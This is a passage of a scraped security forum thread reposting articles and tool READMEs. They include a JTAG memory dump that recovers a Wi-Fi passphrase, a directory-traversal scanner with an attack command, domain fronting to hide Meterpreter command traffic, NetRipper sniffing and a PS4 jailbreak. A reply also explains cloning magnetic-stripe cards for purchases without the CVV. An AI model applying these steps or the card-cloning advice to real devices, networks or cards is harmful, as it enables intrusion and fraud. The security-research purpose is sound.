lowest pin number decreases the number of permutation to iterate through and ultimately speeds up the identification process. JTAGulator connected to the device’s JTAG pins Once connected, you can control using the JTAGulator via USB connection, which will appear as a serial interface. A number of terminal emulators such as PuTTY, Hyperterminal or Minicom can be used to interface with the JTAGulator. In this instance, we will use ‘screen’ utility, which is installed by default on many Linux distributions. It can be used to establish a serial connection to the JTAGulator via the default ttyUSB0 device in Linux machines. The JTAGulator’s baudrate of 115200 should also be provided like so: ? $ sudo screen /dev/ttyUSB0 115200 Once a serial connection to the JTAGulator is established, pressing the ‘h’ key shows a list of JTAG commands available. The first step is to set the target voltage to 3.3V, which pertains to the voltage required by the microprocessor. 3.3V is commonly used by most chips; however, accurate information regarding the operational voltage can be found by looking through the chip’s specification sheet. Setting the correct voltage is important as an incorrect voltage could damage or destroy the device. After setting the voltage, the “Identify JTAG pinout (IDCODE Scan) can be used to identify JTAG pins, which works by reading the device IDs – specifically, TDO, TMS and TCK signals. To identify the TDI pin, the BYPASS scan is used. When running the scans, enter the number of channels to use as five; this will allow the JTAGulator to use the connections made channels CH0 to CH4. The scans should complete fairly quickly as there are only five pins exposed in the board, resulting in a lower number of permutations to be made. If the JTAG implementation appears alongside multiple pinouts, this can increase the number of permutations, thus increasing the duration of the scan. Identifying JTAG pinouts (BYPASS scan) The result of the BYPASS scan show us the location of the signal pinouts on the JTAGulator, which corresponds to the signal pinouts on the smart remote. You can skip this step entirely if the JTAG pinouts are labelled on the silkscreen print on the board, so do not forget to check both sides of the PCB, as it may save valuable time. JTAG signal pinouts printed underneath the board The Shikra In order for us to get debug access on the smart remote, a JTAG adapter and an OCD system is required. Many devices on the market allow interfacing with JTAG, such as Bus Pirate, Shikra and HydraBus. For this scenario, the Shikra and OpenOCD is used. The Shikra is an FT232H USB device often referred to as the “Swiss army knife of hardware hacking”; this device allows us to connect to a number of data interfaces, including UART, JTAG and SPI. A Shikra can be purchased from Xipiter: https://int3.cc/products/the-shikra. The Shikra The following diagram shows the Shikra pinouts for JTAG, which will be used to connect to the board’s corresponding JTAG pinouts. Ensure that the ground (GND) pin is also connected to a ground point on the board. Shikra JTAG connections http://www.xipiter.com/uploads/2/4/4/8/24485815/shikra_documentation.pdf The Shikra giving serial to USB connectivity OpenOCD OpenOCD allows us to perform on-chip debugging of the smart remote via JTAG. In Linux-based systems, you can install the OpenOCD package by running the following command: ? $ sudo apt-get install openocd In order for us to use OpenOCD, a configuration file for the adapter (Shikra) and the target (Smart remote) are required. OpenOCD comes with a number of pre-installed interface and target configuration files; however, the one required does not come in the pre-installed list. The configuration file for the adapter can be found in Xipiter’s getting started guide for the Shikra. Shikra OpenOCD configuration file: ? #shikra.cfg interface ftdi ftdi_vid_pid 0x0403 0x6014 ftdi_layout_init 0x0c08 0x0f1b adapter_khz 2000 #end shikra.cfg Obtaining the configuration file for the target was not as straight forward. The configuration file required was not available within the pre-installed configuration files and attempting to use any of them results in compatibility errors with the device. The approach taken in identifying the appropriate target configuration file involved looking up the microprocessor’s make and model. Using a magnifying glass or a good enough camera, the specific chip printings can be determined. The chip in question is a Marvell 88MC200 and a simple Google search of this chip and the keyword OpenOCD returns the target configuration needed. ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 # # Marvell's Wireless Microcontroller Platform (88MC200) # # https://origin-www.marvell.com/microcontrollers/wi-fi-microcontroller-platform/ # #source [find interface/ftdi/mc200.cfg] if " [info exists CHIPNAME] " " set _CHIPNAME $CHIPNAME " else " set _CHIPNAME mc200 " set _ENDIAN little # Work-area is a space in RAM used for flash programming # By default use 16kB if " [info exists WORKAREASIZE] " " set _WORKAREASIZE $WORKAREASIZE " else " set _WORKAREASIZE 0x4000 " # JTAG scan chain if " [info exists CPUTAPID ] " " set _CPUTAPID $CPUTAPID " else " set _CPUTAPID 0x4ba00477 " jtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID set _TARGETNAME $_CHIPNAME.cpu target create $_TARGETNAME cortex_m -endian $_ENDIAN -chain-position $_TARGETNAME $_TARGETNAME configure -work-area-phys 0x2001C000 -work-area-size $_WORKAREASIZE -work-area-backup 0 # Flash bank set _FLASHNAME $_CHIPNAME.flash flash bank $_FLASHNAME mrvlqspi 0x0 0 0 0 $_TARGETNAME 0x46010000 # JTAG speed should be <= F_CPU/6. F_CPU after reset is 32MHz # so use F_JTAG = 3MHz adapter_khz 3000 adapter_nsrst_delay 100 if "[using_jtag]" " jtag_ntrst_delay 100 " if "![using_hla]" " # if srst is not fitted use SYSRESETREQ to # perform a soft reset cortex_m reset_config sysresetreq " The above configuration file was pointing to an interface path (line 7) which was not required and therefore has been commented out. The configuration file previously downloaded will be used instead and the file location specified as a command line argument in OpenOCD. Once both target and interface configuration files are saved locally, run the following OpenOCD command: ? $ openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/mc200.cfg The file path points to shikra.cfg file, which contains the interface configuration and mc200.cfg contains the target board configuration. The on-chip debugger should now be running and will open local port 4444 on your system. You can then simply connect to this port with Telnet: ? $ telnet localhost 4444 Dumping the device memory Once connected, debug access to the board is now possible and allows control of registers and memory address. Before the registers can be accessed, sending a halt request is required to send the target into a debugging state. After sending the halt request, the reg command is used to view all of the available registers and its values on the device’s CPU. The full list of useful commands is available in the OpenOCD documentation. Registers values shown in OpenOCD Highlighted in the above image is the Stack Pointer (SP) register. Discussing how computer addressing works is beyond the scope of this blog (it is not a simple subject!). For now, it is enough to understand that the location of the Stack Pointer contains the last value pushed onto the stack of things in memory (RAM), serving as the starting address from where user space memory can be accessed. Going back to the original goal of extracting sensitive information from the device, the “dump_image” command can be used to dump memory content (in hex). To successfully dump as much information as possible, a trial and error approach to identify the boundaries of user space memory can be taken. The dump_image command can be used as follows: ? $ dump_image img_out2 0x20002898 120000 The img_out2 argument is the output filename; the next argument is the Stack Pointer address and finally the amount of memory to dump in bytes. Dumping memory to a file The image above shows that initial attempts at dumping memory may fail if a larger amount of bytes than what is available is specified. After successfully dumping the contents of memory in hex, an analysis of the file can be performed to identify any information that might be of interest. Wi-Fi passphrase next to the SSID A hex editor of your choice can be used to navigate around the contents of the file and in the example above, we have used Ghex. Looking around the file and by performing a quick search, we can see the SSID name the device is connected to. 18 bytes after it, the passphrase was also shown. If we had purchased this device second-hand, then we could potentially use it to access someone’s home network and launch further attacks. Conclusion Cyber attacks on smart home devices should now be recognised by home consumers. On the other hand, manufacturers should consider methods for securing the hardware aspect – the very foundation of these devices – to ensure the security and privacy of its users. Cisco’s hardware hacking challenges gives us the opportunity to learn different methods to tamper or attack a device, therefore promoting a greater understanding of the security risks and controls they present. This post has presented a simple proof-of-concept attack on a consumer smart device, whereby a user’s Wi-Fi passphrase can be extracted and therefore allow an attacker to achieve persistent access to a victim’s network. This type of attack can be prevented by disabling – or more effectively – removing the JTAG ports completely from production devices, thereby minimising its attack surface. Sursa: https://labs.portcullis.co.uk/blog/jtag-on-chip-debugging-extracting-passwords-from-memory/
-
CVE-2018-0739: OpenSSL ASN.1 stack overflow This was a vulnerability discovered by Google’s OSS-Fuzz project and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h and based on OpenSSL team’s assessment, this cannot be triggered via SSL/TLS but constructed ASN.1 types with support for recursive definitions, such as PKCS7 can be used to trigger it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 /* * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and * tag mismatch return -1 to handle OPTIONAL */ static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it, int tag, int aclass, char opt, ASN1_TLC *ctx) { const ASN1_TEMPLATE *tt, *errtt = NULL; const ASN1_EXTERN_FUNCS *ef; const ASN1_AUX *aux = it->funcs; ASN1_aux_cb *asn1_cb; const unsigned char *p = NULL, *q; unsigned char oclass; char seq_eoc, seq_nolen, cst, isopt; long tmplen; int i; int otag; int ret = 0; ASN1_VALUE **pchptr; if (!pval) return 0; if (aux && aux->asn1_cb) asn1_cb = aux->asn1_cb; else asn1_cb = 0; switch (it->itype) { ... return 0; } What you see above is a snippet of crypto/asn1/tasn_dec.c where the decoding ASN.1 function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that given a malicious PKCS7 file this decoding routine will keep on trying to decode them until the process will run out of stack space. To fix this, a new error case was added in crypto/asn1/asn1.h header file named ASN1_R_NESTED_TOO_DEEP. If we have a look at crypto/asn1/asn1_err.c we can see that the new error code is equivalent to the “nested too deep” error message. 1 2 3 {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"}, + {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"}, {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"}, Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) definition was added which is used to define the maximum amount of recursive invocations of asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c. 1 2 3 4 5 6 7 8 9 10 11 #include <openssl/err.h> /* * Constructed types with a recursive definition (such as can be found in PKCS7) * could eventually exceed the stack given malicious input with excessive * recursion. Therefore we limit the stack depth. This is the maximum number of * recursive invocations of asn1_item_embed_d2i(). */ #define ASN1_MAX_CONSTRUCTED_NEST 30 static int asn1_check_eoc(const unsigned char **in, long len); Lastly, the asn1_item_embed_d2i() function itself was modified to have a new integer argument “depth” which is used as a counter for each iteration. You can see how check is performed before entering the switch clause here. 1 2 3 4 5 6 7 8 9 asn1_cb = 0; if (++depth > ASN1_MAX_CONSTRUCTED_NEST) { ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP); goto err; } switch (it->itype) { case ASN1_ITYPE_PRIMITIVE: Similarly, all calling functions on OpenSSL have been updated to ensure that the new argument is used as intended. The official security advisory describes the above vulnerability like this. Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739) ========================================================================================== Severity: Moderate Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. OpenSSL 1.1.0 users should upgrade to 1.1.0h OpenSSL 1.0.2 users should upgrade to 1.0.2o This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project. The fix was developed by Matt Caswell of the OpenSSL development team. Sursa: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
-
- 1
-
-
Microsoft Security Response Center (MSRC) Publicat pe 14 feb. 2018 ABONEAZĂ-TE 287 Rob Turner, Qualcomm Technologies Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures. Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...
-
- 1
-
-
53R3N17Y | Python based script for Information Gathering. Operating Systems Tested OSX El Capitan 10.11 Ubuntu 16.04 Backbox 5 Install MacOSX (as root) git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity >echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.zshrc cd /usr/local/share/serenity pip install -r requirements.txt serenity -h Linux (as root) git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity >echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.bashrc cd /usr/local/share/serenity pip install -r requirements.txt serenity -h note: tested with Python 2.7.14 Sursa: https://github.com/abaykan/53R3N17Y
- 1 reply
-
- 3
-
-
Jailbreak Kernel Patches Features Jailbreak Sandbox escape Debug settings Enable UART Disable system update messages Delete system updates Fake self support Fake pkg support RPC server RPC client in C# I use the standard fake pkg keys, created by flatz. General Notes Only for 4.55 Jailbroken PlayStation 4 consoles! The main jkpatch payload utilizes a port of CTurt's payload sdk. Change the Makefile to have LIBPS4 point to the ps4-payload-sdk directory on your machine. I could have it referenced from the home directory but meh... # change this to point to your ps4-payload-sdk directory LIBPS4 := /home/John/ps4-payload-sdk/libPS4 If you decide to edit the resolve code in the kernel payload, make sure you do not mess with... void resolve(uint64_t kernbase); ... as it is called from crt0.s. And changing this will produce errors. See other branches for other kernel support. I will support latest publically exploited firmware on main branch. RPC Quickstart See either Example.cs or look at the RPC documentation. You can read/write memory, call functions, read/write kernel memory, and even load elfs. Here is a cool example of an elf loaded into COD Ghosts (forge mod made by me!) You can download the source code to the forge mod here. Have fun! Coming Soon General code clean up and refactoring Thank you to flatz, idc, zecoxao, hitodama, osdev.org, and anyone else I forgot! Twitter: @cloverleafswag3 psxhax: g991 golden <3 Sursa: https://github.com/xemio/jkpatch
-
- 1
-
-
Da, se poate. https://en.wikipedia.org/wiki/Magnetic_stripe_card Dar cardul clonat nu se va putea folosi la retragere cash de la ATM (probabil). Se va putea folosi la cumparatori fie online (nu e necesar sa fie clonat si unde nu se cere CVV) dar si in magazine care folosesc banda magnetica (prin SUA de exemplu, pe la noi mai rar).
-
Datele de pe banda magnetica includ: numarul de card, numele detinatorului si data de expirare. Banda magnetica se poate copia pe un alt card. Se si pot folosi la plati online (unde nu se cere CVV-ul).
-
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added Metasploit module https://github.com/NytroRST/NetRipper Poate cineva sa faca niste teste? Ar fi util sa stiu daca sunt probleme atat cu capturarea traficului cat si cu modulul de Metasploit. Orice sugestie e apreciata. -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for WinSCP 5.1.3 https://github.com/NytroRST/NetRipper -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for Putty 0.7.0 (64 bits) https://github.com/NytroRST/NetRipper -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
NetRipper - Added support for Putty 0.7.0 (32 bits) -
Tallow - Transparent Tor for Windows Tallow is a small program that redirects all outbound traffic from a Windows machine via the Tor anonymity network. Any traffic that cannot be handled by Tor, e.g. UDP, is blocked. Tallow also intercepts and handles DNS requests preventing potential leaks. Tallow has several applications, including: "Tor-ifying" applications there were never designed to use Tor Filter circumvention -- if you wish to bypass a local filter and are not so concerned about anonymity Better-than-nothing-Tor -- Some Tor may be better than no Tor. Note that, by itself, Tallow is not designed to be a complete strong anonymity solution. See the warnings below. Usage Using the Tallow GUI, simply press the big "Tor" button to start redirecting traffic via the Tor network. Press the button again to stop Tor redirection. Note that your Internet connection may be temporarily interrupted each time you toggle the button. To test if Tor redirection is working, please visit the following site: https://check.torproject.org. Technical Tallow uses the following configuration to connect to the Internet: +-----------+ +-----------+ +----------+ | PC |------->| TOR |------->| SERVER | | a.b.c.d |<-------| a.b.c.d |<-------| x.y.z.w | +-----------+ +-----------+ +----------+ Here (a.b.c.d) represents the local address, and (x.y.z.w) represents a remote server. Tallow uses WinDivert to intercept all traffic to/from your PC. Tallow handles two main traffic types: DNS traffic and TCP streams. DNS queries are intercepted and handled by Tallow itself. Instead of finding the real IP address of a domain, Tallow generates a pseudo-random "fake" domain (in the range 44.0.0.0/24) and uses this address in the query response. The fake-IP is also associated with the domain and recorded in a table for later reference. The alternative would be to look up the real IP via the Tor (which supports DNS). However, since Tallow uses SOCKS4a the real IP is not necessary. Handling DNS requests locally is significantly faster. TCP connections are also intercepted. Tallow "reflects" outbound TCP connects into inbound SOCKS4a connects to the Tor program. If the connection is to a fake-IP, Tallow looks up the corresponding domain and uses this for the SOCKS4a connection. Otherwise the connection is blocked (by default) or a SOCKS4 direct connection via Tor is used. Connecting TCP to SOCKS4(a) is possible with a bit of magic (see redirect.c). All other traffic is simply blocked. This includes all inbound (non-Tor) traffic and outbound traffic that is not TCP nor DNS. In addition, Tallow blocks all domains listed in the hosts.deny file. This includes domains such as Windows update, Windows phone home, and some common ad servers, to help prevent Tor bandwidth wastage. It is possible to edit and customize your hosts.deny file as you see fit. Note that Tallow does not intercept TCP ports 9001 and 9030 that are used by Tor. As a side-effect, Tallow will not work on any other program that uses these ports. History Tallow was derived from the TorWall prototype (where "tallow" is an anagram of "torwall" minus the 'r'). Tallow works slightly differently, and aims to redirect all traffic rather than just HTTP port 80. Also, unlike the prototype, Tallow does not use Privoxy nor does it alter the content of any TCP streams in any way (see warnings below). Building To build Tallow you need the MinGW cross-compiler for Linux. You also need to download and place the following external dependencies and place them in the contrib/ directory: WinDivert-1.4.0-rc-B-MINGW.zip. tor-win32-0.3.2.9.zip. Then simply run the build.sh script. TODOS More comprehensive hosts.deny: By default Windows will "phone home" on a regular basis for various reasons. Tallow attempts to block most of this traffic by default via the hosts.deny file. However, it is unclear how comprehensive the current blacklist really is. Suggestions for new entries are welcome. Warnings Currently Tallow makes no attempt to anonymize the content of traffic sent through the Tor network. This information may be used to de-anonymize you. See this link for more information. Tallow should not be relied on for strong anonymity unless you know what you are doing. Sursa: https://github.com/basil00/TorWall
-
- 3
-
-
-
Twitter Scraper Twitter's API is annoying to work with, and has lots of limitations — luckily their frontend (JavaScript) has it's own API, which I reverse–engineered. No API rate limits. No restrictions. Extremely fast. You can use this library to get the text of any user's Tweets trivially. Very useful for making markov chains. Usage >>> from twitter_scraper import get_tweets >>> for tweet in get_tweets('kennethreitz', pages=1): >>> print(tweet) P.S. your API is a user interface s3monkey just hit 100 github stars! Thanks, y’all! I’m not sure what this /dev/fd/5 business is, but it’s driving me up the wall. … It appears you can ask for up to 25 pages of tweets reliably (~486 tweets). Markov Example First, install markovify: $ pipenv install markovify >>> import markovify >>> tweets = '\n'.join([t for t in get_tweets('kennethreitz', pages=25)]) >>> text_model = markovify.Text(tweets) >>> print(text_model.make_short_sentence(140)) Wtf you can’t use APFS on a prototype for “django-heroku”, which does a lot out of me. Installation $ pipenv install twitter-scraper Only Python 3.6+ is supported. Sursa: https://github.com/kennethreitz/twitter-scraper
-
- 1
-
-
New bypass and protection techniques for ASLR on Linux By Ilya Smith (@blackzert), Positive Technologies researcher 0. Abstract The Linux kernel is used on systems of all kinds throughout the world: servers, user workstations, mobile platforms (Android), and smart devices. Over the life of Linux, many new protection mechanisms have been added both to the kernel itself and to user applications. These mechanisms include address space layout randomization (ASLR) and stack canaries, which complicate attempts to exploit vulnerabilities in applications. This whitepaper analyzes ASLR implementation in the current version of the Linux kernel (4.15-rc1). We found problems that allow bypassing this protection partially or in full. Several fixes are proposed. We have also developed and discussed a special tool to demonstrate these issues. Although all issues are considered here in the context of the x86-64 architecture, they are also generally relevant for most Linux-supported architectures. Many important application functions are implemented in user space. Therefore, when analyzing the ASLR implementation mechanism, we also analyzed part of the GNU Libc (glibc) library, during which we found serious problems with stack canary implementation. We were able to bypass stack canary protection and execute arbitrary code by using ldd. This whitepaper describes several methods for bypassing ASLR in the context of application exploitation. 1. ASLR Address space layout randomization is a technology designed to impede exploitation of certain vulnerability types. ASLR, found in most modern operating systems, works by randomizing addresses of a process so that an attacker is unable to know their location. For instance, these addresses are used to: Delegate control to executable code. Make a chain of return-oriented programming (ROP) gadgets (1). Read (overwrite) important values in memory. The technology was first implemented for Linux in 2005. In 2007, it was introduced in Microsoft Windows and macOS as well. For a detailed description of ASRL implementation in Linux, see (2). Since the appearance of ASLR, attackers have invented various methods of bypassing it, including: Address leak: certain vulnerabilities allow attackers to obtain the addresses required for an attack, which enables bypassing ASLR (3). Relative addressing: some vulnerabilities allow attackers to obtain access to data relative to a particular address, thus bypassing ASLR (4). Implementation weaknesses: some vulnerabilities allow attackers to guess addresses due to low entropy or faults in a particular ASLR implementation (5). Side channels of hardware operation: certain properties of processor operation may allow bypassing ASLR (6). Note that ASLR is implemented very differently on different operating systems, which continue to evolve in their own directions. The most recent changes in Linux ASLR involved Offset2lib (7), which was released in 2014. Implementation weaknesses allowed bypassing ASLR because all libraries were in close proximity to the binary ELF file image of the program. The solution was to place the ELF file image in a separate, randomly selected region. In April 2016, the creators of Offset2lib also criticized the current implementation, pointing out the lack of entropy by ASLR-NG when selecting a region address (8). However, no patch has been published to date. With that in mind, let's take a look at how ASLR currently works on Linux. Articol complet: http://blog.ptsecurity.com/2018/02/new-bypass-and-protection-techniques.html
-
dotdotslash An tool to help you search for Directory Traversal Vulnerabilities Benchmarks Platforms that I tested to validate tool efficiency: DVWA (low/medium/high) bWAPP (low/medium/high) Screenshots Instalation You can download the last version cloning this repository git clone https://github.com/jcesarstef/dotdotslash/ This tool was made to work with Python3 Usage python3 dotdotslash.py --help usage: dotdotslash.py [-h] --url URL --string STRING [--cookie COOKIE] optional arguments: -h, --help show this help message and exit --url URL Url to attack. --string STRING String in --url to attack. Ex: document.pdf --cookie COOKIE Document cookie. Example: python3 dotdotslash.py \ --url "http://192.168.58.101/bWAPP/directory_traversal_1.php?page=a.txt" \ --string "a.txt" \ --cookie "PHPSESSID=089b49151627773d699c277c769d67cb; security_level=3" Links My twitter: https://twitter.com/jcesarstef My Linkedin: https://www.linkedin.com/in/jcesarstef My Blog(Brazilian Portuguese only for now): http://www.inseguro.com.br Sursa: https://github.com/jcesarstef/dotdotslash
-
- 1
-
-
Domain Fronting with Meterpreter Posted on November 30, 2017 Domain Fronting is a technique that is typically used for censorship evasion. It relies on popular Content Delivery Networks (CDNs) such as Amazon’s CloudFront to mask traffic origins. By changing the HTTP Host header, the CDN will happily route us to the correct server. Red Teams have been using this technique for hiding C2 traffic by using high reputation redirectors. For more information on Domain Fronting, please refer to this whitepaper Setting up CloudFront Log in to AWS, and navigate to CloudFront. You will need a domain name that you own, or acquired for free from a registrar like Freenom. Once you are logged into AWS, click Create Distribution. The Origin Domain Name will be the domain that you own. You also need to match origin protocol policy (HTTP/HTTPs), so that CloudFront routes both types of traffic to you. Under Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little traffic as possible. Allow all HTTP methods possible. Set Cache Based on Selected Request Headers to All. For Forward Cookies, also select All. For Query String Forwarding and Caching, select Forward all, cache based on all. Articol complet: https://bitrot.sh/post/30-11-2017-domain-fronting-with-meterpreter/
-
What's New in Qubes 4 Mar 01, 2018 By Kyle Rankin in Desktop Qubes Security Considering making the move to Qubes 4? This article describes a few of the big changes. In my recent article "The Refactor Factor", I talked about the new incarnation of Linux Journal in the context of a big software project doing a refactor: Anyone who's been involved in the Linux community is familiar with a refactor. There's a long history of open-source project refactoring that usually happens around a major release. GNOME and KDE in particular both use .0 releases to rethink those desktop environments completely. Although that refactoring can cause complaints in the community, anyone who has worked on a large software project will tell you that sometimes you have to go in, keep what works, remove the dead code, make it more maintainable and rethink how your users use the software now and how they will use it in the future. I've been using Qubes as my primary desktop for more than two years, and I've written about it previously in my Linux Journal column, so I was pretty excited to hear that Qubes was doing a refactor of its own in the new 4.0 release. As with most refactors, this one caused some past features to disappear throughout the release candidates, but starting with 4.0-rc4, the release started to stabilize with a return of most of the features Qubes 3.2 users were used to. That's not to say everything is the same. In fact, a lot has changed both on the surface and under the hood. Although Qubes goes over all of the significant changes in its Qubes 4 changelog, instead of rehashing every low-level change, I want to highlight just some of the surface changes in Qubes 4 and how they might impact you whether you've used Qubes in the past or are just now trying it out. Installer For the most part, the Qubes 4 installer looks and acts like the Qubes 3.2 installer with one big difference: Qubes 4 uses many different CPU virtualization features out of the box for better security, so it's now much more picky about CPUs that don't have those features enabled, and it will tell you so. At the beginning of the install process after you select your language, you will get a warning about any virtualization features you don't have enabled. In particular, the installer will warn you if you don't have IOMMU (also known as VT-d on Intel processors—a way to present virtualized memory to devices that need DMA within VMs) and SLAT (hardware-enforce memory virtualization). If you skip the warnings and finish the install anyway, you will find you have problems starting up VMs. In the case of IOMMU, you can work around this problem by changing the virtualization mode for the sys-net and sys-usb VMs (the only ones by default that have PCI devices assigned to them) from being HVM (Hardware VM) to PV (ParaVirtualized) from the Qubes dom0 terminal: $ qvm-prefs sys-net virt_mode pv $ qvm-prefs sys-usb virt_mode pv This will remove the reliance on IOMMU support, but it also means you lose the protection IOMMU gives you—malicious DMA-enabled devices you plug in might be able to access RAM outside the VM! (I discuss the differences between HVM and PV VMs in the next section.) VM Changes It's no surprise that the default templates are all updated in Qubes 4—software updates are always expected in a new distribution release. Qubes 4 now ships with Fedora 26 and Debian 9 templates out of the box. The dom0 VM that manages the desktop also has a much newer 4.14.13 kernel and Xen 4.8, so you are more likely to have better hardware support overall (this newer Xen release fixes some suspend issues on newer hardware, like the Purism Librem 13v2, for instance). Another big difference in Qubes 4 is the default VM type it uses. Qubes relies on Xen for its virtualization platform and provides three main virtualization modes for VMs: PV (ParaVirtualized): this is the traditional Xen VM type that requires a Xen-enabled kernel to work. Because of the hooks into the OS, it is very efficient; however, this also means you can't run an OS that doesn't have Xen enabled (such as Windows or Linux distributions without a Xen kernel). HVM (Hardware VM): this VM type uses full hardware virtualization features in the CPU, so you don't need special Xen support. This means you can run Windows VMs or any other OS whether or not it has a Xen kernel, and it also provides much stronger security because you have hardware-level isolation of each VM from other VMs. PVH (PV Hybrid mode): this is a special PV mode that takes advantage of hardware virtualization features while still using a pavavirtualized kernel. In the past, Qubes would use PV for all VMs by default, but starting with Qubes 4, almost all of the VMs will default to PVH mode. Although initially the plan was to default all VMs to HVM mode, now the default for most VMs is PVH mode to help protect VMs from Meltdown with HVM mode being reserved for VMs that have PCI devices (like sys-net and sys-usb). GUI VM Manager Another major change in Qubes 4 relates to the GUI VM manager. In past releases, this program provided a graphical way for you to start, stop and pause VMs. It also allowed you to change all your VM settings, firewall rules and even which applications appeared in the VM's menu. It also provided a GUI way to back up and restore VMs. With Qubes 4, a lot has changed. The ultimate goal with Qubes 4 is to replace the VM manager with standalone tools that replicate most of the original functionality. One of the first parts of the VM manager to be replaced is the ability to manage devices (the microphone and USB devices including storage devices). In the past, you would insert a USB thumb drive and then right-click on a VM in the VM manager to attach it to that VM, but now there is an ever-present icon in the desktop panel (Figure 1) you can click that lets you assign the microphone and any USB devices to VMs directly. Beside that icon is another Qubes icon you can click that lets you shut down VMs and access their preferences. Figure 1. Device Management from the Panel For quite a few release candidates, those were the only functions you could perform through the GUI. Everything else required you to fall back to the command line. Starting with the Qubes 4.0-rc4 release though, a new GUI tool called the Qube Manager has appeared that attempts to replicate most of the functionality of the previous tool including backup and restore (Figure 2). The main features the new tool is missing are those features that were moved out into the panel. It seems like the ultimate goal is to move all of the features out into standalone tools, and this GUI tool is more of a stopgap to deal with the users who had relied on it in the past. Figure 2. New Qube Manager Backup and Restore The final obvious surface change you will find in Qubes 4 is in backup and restore. With the creation of the Qube Manager, you now can back up your VM's GUI again, just like with Qubes 3.2. The general backup process is the same as in the past, but starting with Qubes 4, all backups are encrypted instead of having that be optional. Restoring backups also largely behaves like in past releases. One change, however, is when restoring Qubes 3.2 VMs. Some previous release candidates couldn't restore 3.2 VMs at all. Although you now can restore Qubes 3.2 VMs in Qubes 4, there are a few changes. First, old dom0 backups won't show up to restore, so you'll need to move over those files manually. Second, old template VMs don't contain some of the new tools Qubes 4 templates have, so although you can restore them, they may not integrate well with Qubes 4 without some work. This means when you restore VMs that depend on old templates, you will want to change them to point to the new Qubes 4 templates. At that point, they should start up as usual. Conclusion As I mentioned at the beginning of this article, these are only some of the more obvious surface changes in Qubes 4. Like with most refactors, even more has changed behind the scenes as well. If you are curious about some the underlying technology changes, check out the Qubes 4 release notes and follow the links related to specific features. ______________________ Kyle Rankin is Chief Security Officer at Purism, a company focused on computers that respect your privacy, security, and freedom. He is the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu Sursa: http://www.linuxjournal.com/content/whats-new-qubes-4
-
Posted on February 21, 2018 · Posted in Windows 10, Windows 7 Port Forwarding in Windows In Microsoft Windows, starting from Windows XP, there is a built-in ability to set up network ports forwarding. Due to it, any incoming TCP connection (IPv4 or IPv6) to local port can be redirected to another local port or even to port on the remote computer. And it is not necessary that the system has a service that listens to this port. In Linux, port redirection is configured quite simply using iptables. On Windows Server systems, the Routing and Remote Access Service (RRAS) is used to organize port forwarding. However, there is an easier way to configure the port forwarding, which works equally well in any version of Windows. Port forwarding in Windows can be configured using Portproxy mode of the command Netsh. The syntax of this command is as follows: netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport where listenaddress – is a local IP address waiting for a connection listenport – local listening TCP port (the connection is waited on it) connectaddress – is an local or remote IP address (or DNS name) to which the incoming connection will be redirected connectport – is a TCP port to which the connection from listenport is forwarded to Suppose, that our task is to make the RDP service to respond on a non-standard port, for example 3340 (the port can be changed in the settings of the service, but we will use RDP to make it easier to demonstrate forwarding). To do this, you need to redirect incoming traffic to TCP port 3340 to another local port – 3389 (standard rdp port). Start the command prompt as an administrator and perform the following command: netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 Where 10.10.1.110 – the current IP address of this computer Using netstat make sure that port 3340 is listened now netstat -ano | findstr :3340 Note. If this command does not return anything and port forwarding via the netsh interface portproxy does not work, make sure that you have the iphlpsvc (IP Helper) 